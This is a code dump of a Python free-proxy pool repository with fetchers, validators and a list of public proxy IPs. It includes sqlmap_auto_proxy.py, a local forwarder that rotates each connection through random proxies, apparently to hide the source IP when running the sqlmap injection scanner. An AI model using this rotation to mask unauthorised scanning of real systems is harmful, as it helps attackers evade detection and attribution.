77 | file_handler.setFormatter(formatter)
78 | self.file_handler = file_handler
79 | self.addHandler(file_handler)
80 |
81 | def __setStreamHandler__(self, level=None):
82 | """
83 | set stream handler
84 | :param level:
85 | :return:
86 | """
87 | stream_handler = logging.StreamHandler()
88 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
89 | stream_handler.setFormatter(formatter)
90 | if not level:
91 | stream_handler.setLevel(self.level)
92 | else:
93 | stream_handler.setLevel(level)
94 | self.addHandler(stream_handler)
95 |
96 |
97 | if __name__ == '__main__':
98 | log = LogHandler('test')
99 | log.info('this is a test msg')
--------------------------------------------------------------------------------
/Proxy/handler/proxyHandler.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # from hutaow
3 | import sys
4 | import socket
5 | import logging
6 | import threading
7 | import random
8 | local_ip = '127.0.0.1'
9 | local_port = 10086
10 | PKT_BUFF_SIZE = 2048
11 | #日志设置
12 | logger = logging.getLogger("Proxy Logging")
13 | formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)
14 | stream_handler = logging.StreamHandler(sys.stderr)
15 | stream_handler.setFormatter(formatter)
16 | logger.addHandler(stream_handler)
17 | logger.setLevel(logging.DEBUG)
18 |
19 | def tcp_mapping_worker(conn_receiver, conn_sender):
20 | while True:
21 | try:
22 | data = conn_receiver.recv(PKT_BUFF_SIZE)
23 | except Exception:
24 | print('Connection closed.')
25 | break
26 | if not data:
27 | print('No more data is received.')
28 | break
29 | try:
30 | conn_sender.sendall(data)
31 | except Exception:
32 | print('Failed sending data.')
33 | break
34 | print('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))
35 | conn_receiver.close()
36 | conn_sender.close()
37 | return
38 |
39 | def tcp_mapping_request(local_conn, remote_ip, remote_port):
40 |
41 | while True:
42 | remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43 | try:
44 | remote_conn.settimeout(3)
45 | remote_conn.connect((remote_ip, remote_port))
46 | except Exception:
47 | print('Unable to connect to the remote server.')
48 | continue
49 | threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
50 | threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
51 | return
52 |
53 | def switchPro(proxylist):
54 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
55 | local_server.bind((local_ip, local_port))
56 | local_server.listen(5)
57 | #logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
58 | print('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
59 |
60 | while True:
61 | try:
62 | (local_conn, local_addr) = local_server.accept()
63 | proxyip = random.choice(proxylist)
64 | print("[!]Now proxy ip:"+str(proxyip))
65 | prip, prpo = proxyip.split(":")
66 | except Exception:
67 | local_server.close()
68 | print('Stop mapping service.')
69 | #logger.debug('Stop mapping service.')
70 | break
71 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
72 | print('Receive mapping request from %s:%d.' % local_addr)
73 |
74 |
75 | def Loadips():
76 | ip_list = []
77 | ip = ['ip','port']
78 | with open('ips.txt') as ips:
79 | lines = ips.readlines()
80 | for line in lines:
81 | ip[0],ip[1] = line.strip().split(":")
82 | ip[1] = eval(ip[1])
83 | nip = tuple(ip)
84 | ip_list.append(nip)
85 | return ip_list
86 |
87 | if __name__ == '__main__':
88 | a = Loadips()
89 | print(a)
90 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
91 | local_server.bind((local_ip, local_port))
92 | local_server.listen(5)
93 | logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
94 | while True:
95 | try:
96 | (local_conn, local_addr) = local_server.accept()
97 | proxyip = random.choice(a)
98 | print("[!]Now proxy ip:"+str(proxyip))
99 | prip = proxyip[0]
100 | prpo= proxyip[1]
101 | except Exception:
102 | local_server.close()
103 | logger.debug('Stop mapping service.')
104 | break
105 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
106 | logger.debug('Receive mapping request from %s:%d.' % local_addr)
--------------------------------------------------------------------------------
/Proxy/helper/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__init__.py
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/check.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/proxy.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/proxy.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/__pycache__/validator.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/validator.cpython-37.pyc
--------------------------------------------------------------------------------
/Proxy/helper/check.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: check
5 | Description : 执行代理校验
6 | Author : JHao
7 | date: 2019/8/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/08/06: 执行代理校验
11 | 2021/05/25: 分别校验http和https
12 | -------------------------------------------------
13 | """
14 | __author__ = 'JHao'
15 |
16 | from Proxy.util.six import Empty
17 | from threading import Thread
18 | from datetime import datetime
19 | from Proxy.handler.logHandler import LogHandler
20 | from Proxy.helper.validator import ProxyValidator
21 | from Proxy.handler.configHandler import ConfigHandler
22 | import threading
23 |
24 | class DoValidator(object):
25 | """ 执行校验 """
26 |
27 | @classmethod
28 | def validator(cls, proxy):
29 | """
30 | 校验入口
31 | Args:
32 | proxy: Proxy Object
33 | Returns:
34 | Proxy Object
35 | """
36 | http_r = cls.httpValidator(proxy)
37 | https_r = False if not http_r else cls.httpsValidator(proxy)
38 |
39 | proxy.check_count += 1
40 | proxy.last_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
41 | proxy.last_status = True if http_r else False
42 | if http_r:
43 | if proxy.fail_count > 0:
44 | proxy.fail_count -= 1
45 | proxy.https = True if https_r else False
46 | else:
47 | proxy.fail_count += 1
48 | return proxy
49 |
50 | @classmethod
51 | def http_or_https(cls, proxy, anonymous=False):
52 | if anonymous:
53 | cls.anonymousValidator(proxy)
54 | else:
55 | if 'HTTPS' in proxy.https or '支持' in proxy.https:
56 | cls.httpsValidator(proxy)
57 | else:
58 | cls.httpValidator(proxy)
59 | @classmethod
60 | def httpValidator(cls, proxy):
61 | for func in ProxyValidator.http_validator:
62 | if not func(proxy):
63 | proxy.last_status = None
64 | return False
65 | proxy._https = 'HTTP'
66 | return True
67 |
68 | @classmethod
69 | def httpsValidator(cls, proxy):
70 | for func in ProxyValidator.https_validator:
71 | if not func(proxy):
72 | proxy.last_status = None
73 | return False
74 | proxy._https = 'HTTPS'
75 | return True
76 |
77 | @classmethod
78 | def preValidator(cls, proxy):
79 | for func in ProxyValidator.pre_validator:
80 | if not func(proxy):
81 | proxy.last_status = None
82 | return False
83 | return True
84 |
85 | @classmethod
86 | def anonymousValidator(cls, proxy):
87 | for func in ProxyValidator.anonymous_validator:
88 | if not func(proxy):
89 | proxy.last_status = None
90 | proxy._anonymous = '透明'
91 | return False
92 | proxy._anonymous = '高匿'
93 | return True
94 |
95 |
96 | class _ThreadChecker(Thread):
97 | threadLock = threading.Lock()
98 | temp_list = []
99 | """ 多线程检测 """
100 |
101 | def __init__(self, work_type, target_queue, thread_name):
102 | Thread.__init__(self, name=thread_name)
103 | self.work_type = work_type
104 | self.log = LogHandler("checker")
105 | #self.proxy_handler = ProxyHandler()
106 | self.target_queue = target_queue
107 | self.conf = ConfigHandler()
108 |
109 | def run(self):
110 | self.log.info("{}ProxyCheck - {}: start".format(self.work_type.title(), self.name))
111 | while True:
112 | try:
113 | proxy = self.target_queue.get(block=False)
114 | except Empty:
115 | self.log.info("{}ProxyCheck - {}: complete".format(self.work_type.title(), self.name))
116 | break
117 | proxy = DoValidator.validator(proxy)
118 |
119 | if proxy.last_status or proxy.https:
120 | self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
121 | _ThreadChecker.temp_list.append(proxy.proxy)
122 | else:
123 | self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23)))
124 |
125 | #if self.work_type == "raw":
126 | # self.__ifRaw(proxy)
127 | #else:
128 | # self.__ifUse(proxy)
129 | self.target_queue.task_done()
130 |
131 | #def __ifRaw(self, proxy):
132 | # if proxy.last_status:
133 | # if self.proxy_handler.exists(proxy):
134 | # self.log.info('RawProxyCheck - {}: {} exist'.format(self.name, proxy.proxy.ljust(23)))
135 | # else:
136 | # self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
137 | # self.proxy_handler.put(proxy)
138 | # else:
139 | # self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23)))
140 |
141 | #def __ifUse(self, proxy):
142 | # if proxy.last_status:
143 | # self.log.info('UseProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
144 | # self.proxy_handler.put(proxy)
145 | # else:
146 | # if proxy.fail_count > self.conf.maxFailCount:
147 | # self.log.info('UseProxyCheck - {}: {} fail, count {} delete'.format(self.name,
148 | # proxy.proxy.ljust(23),
149 | # proxy.fail_count))
150 | # self.proxy_handler.delete(proxy)
151 | # else:
152 | # self.log.info('UseProxyCheck - {}: {} fail, count {} keep'.format(self.name,
153 | # proxy.proxy.ljust(23),
154 | # proxy.fail_count))
155 | # self.proxy_handler.put(proxy)
156 |
157 | def Checker(tp='raw', queue=None):
158 | """
159 | run Proxy ThreadChecker
160 | :param tp: raw/use
161 | :param queue: Proxy Queue
162 | :return:
163 | """
164 | thread_list = list()
165 | for index in range(20):
166 | thread_list.append(_ThreadChecker(tp, queue, "thread_%s" % str(index).zfill(2)))
167 |
168 | for thread in thread_list:
169 | thread.setDaemon(True)
170 | thread.start()
171 |
172 | for thread in thread_list:
173 | thread.join()
174 |
175 | return _ThreadChecker.temp_list
--------------------------------------------------------------------------------
/Proxy/helper/fetch.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: fetchScheduler
5 | Description :
6 | Author : JHao
7 | date: 2019/8/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/08/06:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | from Proxy.helper.proxy import Proxy
16 | from Proxy.helper.check import DoValidator
17 | from Proxy.handler.logHandler import LogHandler
18 | #from Proxy.handler.proxyHandler import ProxyHandler
19 | from Proxy.proxyFetcher import ProxyFetcher
20 | from Proxy.handler.configHandler import ConfigHandler
21 |
22 |
23 | class Fetcher(object):
24 | name = "fetcher"
25 |
26 | def __init__(self):
27 | self.log = LogHandler(self.name)
28 | self.conf = ConfigHandler()
29 | #self.proxy_handler = ProxyHandler()
30 |
31 | def run(self):
32 | """
33 | fetch proxy with proxyFetcher
34 | :return:
35 | """
36 | proxy_dict = dict()
37 | self.log.info("ProxyFetch : start")
38 | for fetch_source in self.conf.fetchers:
39 | self.log.info("ProxyFetch - {func}: start".format(func=fetch_source))
40 | fetcher = getattr(ProxyFetcher, fetch_source, None)
41 | if not fetcher:
42 | self.log.error("ProxyFetch - {func}: class method not exists!".format(func=fetch_source))
43 | continue
44 | if not callable(fetcher):
45 | self.log.error("ProxyFetch - {func}: must be class method".format(func=fetch_source))
46 | continue
47 |
48 | try:
49 | for proxy in fetcher():
50 | self.log.info('ProxyFetch - %s: %s ok' % (fetch_source, proxy.ljust(23)))
51 | proxy = proxy.strip()
52 | if proxy in proxy_dict:
53 | proxy_dict[proxy].add_source(fetch_source)
54 | else:
55 | proxy_dict[proxy] = Proxy(proxy, source=fetch_source)
56 | except Exception as e:
57 | self.log.error("ProxyFetch - {func}: error".format(func=fetch_source))
58 | self.log.error(str(e))
59 | self.log.info("ProxyFetch - all complete!")
60 | for _ in proxy_dict.values():
61 | if DoValidator.preValidator(_.proxy):
62 | yield _
63 |
--------------------------------------------------------------------------------
/Proxy/helper/proxy.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: Proxy
5 | Description : 代理对象类型封装
6 | Author : JHao
7 | date: 2019/7/11
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/7/11: 代理对象类型封装
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import json
16 |
17 |
18 | class Proxy(object):
19 |
20 | def __init__(self, proxy, fail_count=0, region="", anonymous="",
21 | source="", check_count=0, last_status="", last_time="", https=False):
22 | self._proxy = proxy
23 | self._fail_count = fail_count
24 | self._region = region
25 | self._anonymous = anonymous
26 | self._source = source.split('/')
27 | self._check_count = check_count
28 | self._last_status = last_status
29 | self._last_time = last_time
30 | self._https = https
31 |
32 | @classmethod
33 | def createFromJson(cls, proxy_json):
34 | _dict = json.loads(proxy_json)
35 | return cls(proxy=_dict.get("proxy", ""),
36 | fail_count=_dict.get("fail_count", 0),
37 | region=_dict.get("region", ""),
38 | anonymous=_dict.get("anonymous", ""),
39 | source=_dict.get("source", ""),
40 | check_count=_dict.get("check_count", 0),
41 | last_status=_dict.get("last_status", ""),
42 | last_time=_dict.get("last_time", ""),
43 | https=_dict.get("https", False)
44 | )
45 |
46 | @property
47 | def proxy(self):
48 | """ 代理 ip:port """
49 | return self._proxy
50 |
51 | @property
52 | def fail_count(self):
53 | """ 检测失败次数 """
54 | return self._fail_count
55 |
56 | @property
57 | def region(self):
58 | """ 地理位置(国家/城市) """
59 | return self._region
60 |
61 | @property
62 | def anonymous(self):
63 | """ 匿名 """
64 | return self._anonymous
65 |
66 | @property
67 | def source(self):
68 | """ 代理来源 """
69 | return '/'.join(self._source)
70 |
71 | @property
72 | def check_count(self):
73 | """ 代理检测次数 """
74 | return self._check_count
75 |
76 | @property
77 | def last_status(self):
78 | """ 最后一次检测结果 True -> 可用; False -> 不可用"""
79 | return self._last_status
80 |
81 | @property
82 | def last_time(self):
83 | """ 最后一次检测时间 """
84 | return self._last_time
85 |
86 | @property
87 | def https(self):
88 | """ 是否支持https """
89 | return self._https
90 |
91 | @property
92 | def to_dict(self):
93 | """ 属性字典 """
94 | return {"proxy": self.proxy,
95 | "https": self.https,
96 | "fail_count": self.fail_count,
97 | "region": self.region,
98 | "anonymous": self.anonymous,
99 | "source": self.source,
100 | "check_count": self.check_count,
101 | "last_status": self.last_status,
102 | "last_time": self.last_time}
103 |
104 | @property
105 | def to_json(self):
106 | """ 属性json格式 """
107 | return json.dumps(self.to_dict, ensure_ascii=False)
108 |
109 | @fail_count.setter
110 | def fail_count(self, value):
111 | self._fail_count = value
112 |
113 | @check_count.setter
114 | def check_count(self, value):
115 | self._check_count = value
116 |
117 | @last_status.setter
118 | def last_status(self, value):
119 | self._last_status = value
120 |
121 | @last_time.setter
122 | def last_time(self, value):
123 | self._last_time = value
124 |
125 | @https.setter
126 | def https(self, value):
127 | self._https = value
128 |
129 | def add_source(self, source_str):
130 | if source_str:
131 | self._source.append(source_str)
132 | self._source = list(set(self._source))
133 |
--------------------------------------------------------------------------------
/Proxy/helper/validator.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: _validators
5 | Description : 定义proxy验证方法
6 | Author : JHao
7 | date: 2021/5/25
8 | -------------------------------------------------
9 | Change Activity:
10 | 2021/5/25:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | from re import findall
16 | from requests import head,get
17 | from Proxy.util.six import withMetaclass
18 | from Proxy.util.singleton import Singleton
19 | from Proxy.handler.configHandler import ConfigHandler
20 | import json
21 |
22 | conf = ConfigHandler()
23 |
24 | HEADER = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
25 | 'Accept': '*/*',
26 | 'Connection': 'keep-alive',
27 | 'Accept-Language': 'zh-CN,zh;q=0.8'}
28 |
29 |
30 | class ProxyValidator(withMetaclass(Singleton)):
31 | pre_validator = []
32 | http_validator = []
33 | https_validator = []
34 | anonymous_validator = []
35 |
36 | @classmethod
37 | def addPreValidator(cls, func):
38 | cls.pre_validator.append(func)
39 | return func
40 |
41 | @classmethod
42 | def addHttpValidator(cls, func):
43 | cls.http_validator.append(func)
44 | return func
45 |
46 | @classmethod
47 | def addHttpsValidator(cls, func):
48 | cls.https_validator.append(func)
49 | return func
50 |
51 | @classmethod
52 | def addAnonymousValidator(cls, func):
53 | cls.anonymous_validator.append(func)
54 | return func
55 |
56 |
57 | @ProxyValidator.addPreValidator
58 | def formatValidator(proxy):
59 | """检查代理格式"""
60 | verify_regex = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}"
61 | _proxy = findall(verify_regex, proxy)
62 | return True if len(_proxy) == 1 and _proxy[0] == proxy else False
63 |
64 |
65 | @ProxyValidator.addHttpValidator
66 | def httpTimeOutValidator(proxy):
67 | """ http检测超时 """
68 |
69 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
70 |
71 | try:
72 | r = head(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout)
73 | #r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout)
74 | #return True if r.status_code == 200 and ',' not in r.text else False
75 | return True if r.status_code == 200 else False
76 | except Exception as e:
77 | return False
78 |
79 |
80 | @ProxyValidator.addHttpsValidator
81 | def httpsTimeOutValidator(proxy):
82 | """https检测超时"""
83 |
84 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
85 | try:
86 | r = head(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
87 | #r = get(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
88 | #return True if r.status_code == 200 and ',' not in r.text else False
89 | return True if r.status_code == 200 else False
90 | except Exception as e:
91 | return False
92 |
93 | @ProxyValidator.addAnonymousValidator
94 | def customValidatorExample(proxy):
95 | """自定义validator函数,校验代理是否可用, 返回True/False"""
96 | """高匿代理检测"""
97 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
98 | try:
99 | r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
100 | return True if r.status_code == 200 and ',' not in r.text else False
101 | #return True if r.status_code == 200 else False
102 | except Exception as e:
103 | return False
104 | #return True
105 |
--------------------------------------------------------------------------------
/Proxy/ips.txt:
--------------------------------------------------------------------------------
1 | {"proxy": "47.57.188.208:80", "https": "HTTP", "anonymous": "\u900f\u660e"}
2 | {"proxy": "112.6.117.135:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"}
3 | {"proxy": "112.6.117.178:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"}
4 | {"proxy": "152.136.62.181:9999", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"}
5 | {"proxy": "183.247.207.225:30001", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"}
6 |
--------------------------------------------------------------------------------
/Proxy/log/Apache Shiro:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/Apache Shiro
--------------------------------------------------------------------------------
/Proxy/log/test.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/test.log
--------------------------------------------------------------------------------
/Proxy/proxySetting.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: setting.py
5 | Description : 配置文件
6 | Author : JHao
7 | date: 2019/2/15
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/2/15:
11 | -------------------------------------------------
12 | """
13 |
14 | BANNER = r"""
15 | ****************************************************************
16 | *** ______ ********************* ______ *********** _ ********
17 | *** | ___ \_ ******************** | ___ \ ********* | | ********
18 | *** | |_/ / \__ __ __ _ __ _ | |_/ /___ * ___ | | ********
19 | *** | __/| _// _ \ \ \/ /| | | || __// _ \ / _ \ | | ********
20 | *** | | | | | (_) | > < \ |_| || | | (_) | (_) || |___ ****
21 | *** \_| |_| \___/ /_/\_\ \__ |\_| \___/ \___/ \_____/ ****
22 | **** __ / / *****
23 | ************************* /___ / *******************************
24 | ************************* ********************************
25 | ****************************************************************
26 | """
27 |
28 | VERSION = "2.3.0"
29 |
30 | # ############### server config ###############
31 | #HOST = "0.0.0.0"
32 |
33 | #PORT = 5010
34 |
35 | # ############### database config ###################
36 | # db connection uri
37 | # example:
38 | # Redis: redis://:password@ip:port/db
39 | # Ssdb: ssdb://:password@ip:port
40 | #DB_CONN = 'redis://:pwd@127.0.0.1:6379/0'
41 |
42 | # proxy table name
43 | #TABLE_NAME = 'use_proxy'
44 |
45 |
46 | # ###### config the proxy fetch function ######
47 | #PROXY_FETCHER = [
48 | # "freeProxy01",
49 | # "freeProxy02",
50 | # "freeProxy03",
51 | # # "freeProxy04",
52 | # "freeProxy05",
53 | # "freeProxy06",
54 | # "freeProxy07",
55 | # "freeProxy08",
56 | # "freeProxy09",
57 | # "freeProxy13",
58 | # "freeProxy14"
59 | #]
60 |
61 | # ############# proxy validator #################
62 | # 代理验证目标网站
63 | HTTP_URL = "http://httpbin.org/ip"
64 |
65 | HTTPS_URL = "https://httpbin.org/ip"
66 |
67 | # 代理验证时超时时间
68 | VERIFY_TIMEOUT = 5
69 |
70 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败次数,超过则剔除代理
71 | MAX_FAIL_COUNT = 0
72 |
73 | # 近PROXY_CHECK_COUNT次校验中允许的最大失败率,超过则剔除代理
74 | # MAX_FAIL_RATE = 0.1
75 |
76 | # proxyCheck时代理数量少于POOL_SIZE_MIN触发抓取
77 | POOL_SIZE_MIN = 20
78 |
79 | # ############# scheduler config #################
80 |
81 | # Set the timezone for the scheduler forcely (optional)
82 | # If it is running on a VM, and
83 | # "ValueError: Timezone offset does not match system offset"
84 | # was raised during scheduling.
85 | # Please uncomment the following line and set a timezone for the scheduler.
86 | # Otherwise it will detect the timezone from the system automatically.
87 |
88 | TIMEZONE = "Asia/Shanghai"
--------------------------------------------------------------------------------
/Proxy/sqlmap_auto_proxy.bat:
--------------------------------------------------------------------------------
1 | python3 sqlmap_auto_proxy.py
2 | pause
--------------------------------------------------------------------------------
/Proxy/sqlmap_auto_proxy.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # from hutaow
3 | import sys
4 | import socket
5 | import logging
6 | import threading
7 | import random
8 | import json
9 | local_ip = '127.0.0.1'
10 | local_port = 9999
11 | PKT_BUFF_SIZE = 2048
12 | logger = logging.getLogger("Proxy Logging")
13 | formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)
14 | stream_handler = logging.StreamHandler(sys.stderr)
15 | stream_handler.setFormatter(formatter)
16 | logger.addHandler(stream_handler)
17 | logger.setLevel(logging.DEBUG)
18 | def tcp_mapping_worker(conn_receiver, conn_sender):
19 | while True:
20 | if conn_receiver.fileno() == -1 or conn_sender.fileno() == -1:
21 | logger.debug('Socket has closed. ')
22 | return
23 | #if getattr(conn_receiver, '_closed') == True or getattr(conn_sender, '_closed') == True:
24 | try:
25 | data = conn_receiver.recv(PKT_BUFF_SIZE)
26 | except Exception as e:
27 | logger.debug('Connection closed. %s'%e)
28 | break
29 | if not data:
30 | logger.info('No more data is received.')
31 | break
32 | try:
33 | conn_sender.sendall(data)
34 | except Exception as e:
35 | logger.error('Failed sending data. %s'%e)
36 | break
37 | logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))
38 | #else:
39 | #return
40 | conn_receiver.close()
41 | conn_sender.close()
42 | return
43 |
44 | def tcp_mapping_request(local_conn, remote_ip, remote_port):
45 | #切换IP次数
46 | retry_sock = 2
47 | #单个连接最大重试次数
48 | retry_count = 1
49 | while True:
50 | remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
51 | try:
52 | remote_conn.settimeout(2)
53 | remote_conn.connect((remote_ip, remote_port))
54 | except Exception:
55 | if retry_count > 0:
56 | logger.error('Unable to connect to the remote server. Number of retries remaining %s'%retry_count)
57 | retry_count -= 1
58 | continue
59 | elif retry_sock > 0:
60 | #重置重试次数
61 | retry_count = 1
62 | #切换IP次数减一
63 | retry_sock -= 1
64 | proxyip = random.choice(a)
65 | print("[!]Switch proxy ip:"+str(proxyip))
66 | remote_ip = proxyip[0]
67 | remote_port= proxyip[1]
68 | continue
69 | else:
70 | #代理不稳定,建议切换
71 | logger.info('Proxy is not stability.')
72 | local_conn.close()
73 | remote_conn.close()
74 | return
75 |
76 | threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
77 | threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
78 | return
79 |
80 | def Loadips():
81 | ip_list = []
82 | ip = ['ip','port']
83 | with open('ips.txt') as ips:
84 | lines = ips.readlines()
85 | for line in lines:
86 | proxy = json.loads(line.strip()).get("proxy", "")
87 | ip[0],ip[1] = proxy.split(":")
88 | ip[1] = eval(ip[1])
89 | nip = tuple(ip)
90 | ip_list.append(nip)
91 | return ip_list
92 |
93 | a = Loadips()
94 |
95 | if __name__ == '__main__':
96 | print(a)
97 | local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
98 | local_server.bind((local_ip, local_port))
99 | local_server.listen(5)
100 | logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
101 | while True:
102 | try:
103 | (local_conn, local_addr) = local_server.accept()
104 | proxyip = random.choice(a)
105 | print("[!]Now proxy ip:"+str(proxyip))
106 | prip = proxyip[0]
107 | prpo= proxyip[1]
108 | except Exception:
109 | local_server.close()
110 | logger.debug('Stop mapping service.')
111 | break
112 | threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
113 | logger.debug('Receive mapping request from %s:%d.' % local_addr)
--------------------------------------------------------------------------------
/Proxy/util/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: __init__
5 | Description :
6 | Author : JHao
7 | date: 2020/7/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/7/6:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
--------------------------------------------------------------------------------
/Proxy/util/lazyProperty.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: lazyProperty
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 |
16 | class LazyProperty(object):
17 | """
18 | LazyProperty
19 | explain: http://www.spiderpy.cn/blog/5/
20 | """
21 |
22 | def __init__(self, func):
23 | self.func = func
24 |
25 | def __get__(self, instance, owner):
26 | if instance is None:
27 | return self
28 | else:
29 | value = self.func(instance)
30 | setattr(instance, self.func.__name__, value)
31 | return value
32 |
--------------------------------------------------------------------------------
/Proxy/util/singleton.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: singleton
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 |
16 | class Singleton(type):
17 | """
18 | Singleton Metaclass
19 | """
20 |
21 | _inst = {}
22 |
23 | def __call__(cls, *args, **kwargs):
24 | if cls not in cls._inst:
25 | cls._inst[cls] = super(Singleton, cls).__call__(*args)
26 | return cls._inst[cls]
27 |
--------------------------------------------------------------------------------
/Proxy/util/six.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: six
5 | Description :
6 | Author : JHao
7 | date: 2020/6/22
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/6/22:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import sys
16 |
17 | PY2 = sys.version_info[0] == 2
18 | PY3 = sys.version_info[0] == 3
19 |
20 | if PY3:
21 | def iteritems(d, **kw):
22 | return iter(d.items(**kw))
23 | else:
24 | def iteritems(d, **kw):
25 | return d.iteritems(**kw)
26 |
27 | if PY3:
28 | from urllib.parse import urlparse
29 | else:
